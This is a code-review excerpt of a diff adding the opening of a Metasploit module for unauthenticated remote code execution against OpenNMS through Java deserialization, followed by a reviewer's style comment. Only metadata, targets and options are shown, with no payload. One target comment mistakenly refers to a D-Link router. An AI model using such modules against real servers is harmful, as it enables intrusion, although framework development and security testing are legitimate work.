modules/exploits/linux/misc/opennms_java_serialize.rb

```diff
@@ -0,0 +1,175 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'OpenNMS Java Object Unserialization Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a vulnerability in the OpenNMS Java object which allows
+        an unauthenticated attacker to run arbitary code against the system.
+      },
+      'Author'         =>
+        [
+          'Ben Turner <benpturner[at]yahoo.com>', # @benpturner
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/' ]
+        ],
+      'Targets'        =>
+        # Only tested on D-Link DIR-626L where wget is available
+        [
+          [ 'OpenNMS / Linux x86',
+            {
+            'Arch' => ARCH_X86,
+            'Platform' => 'linux'
+            }
+          ],
+          [ 'OpenNMS / Linux x86_64',
+            {
+            'Arch' => ARCH_X86_64,
+            'Platform' => 'linux'
+            }
+          ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Nov 19 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(1099),
+        OptString.new('WRITABLEDIR', [false, 'A writable directory on the host', '/tmp/'])
+      ], self.class)
+  end
+
+  def rhost
+    datastore['RHOST']
+  end
+
+  def rport
+    datastore['RPORT']
+  end
```

Comment:
The peer is now part of the tcp mixin. You can remove these two and change the ```#{rhost}:#{rport}``` in the vprint_status on line 112 and vprint_error on line 156 with ```#{peer}```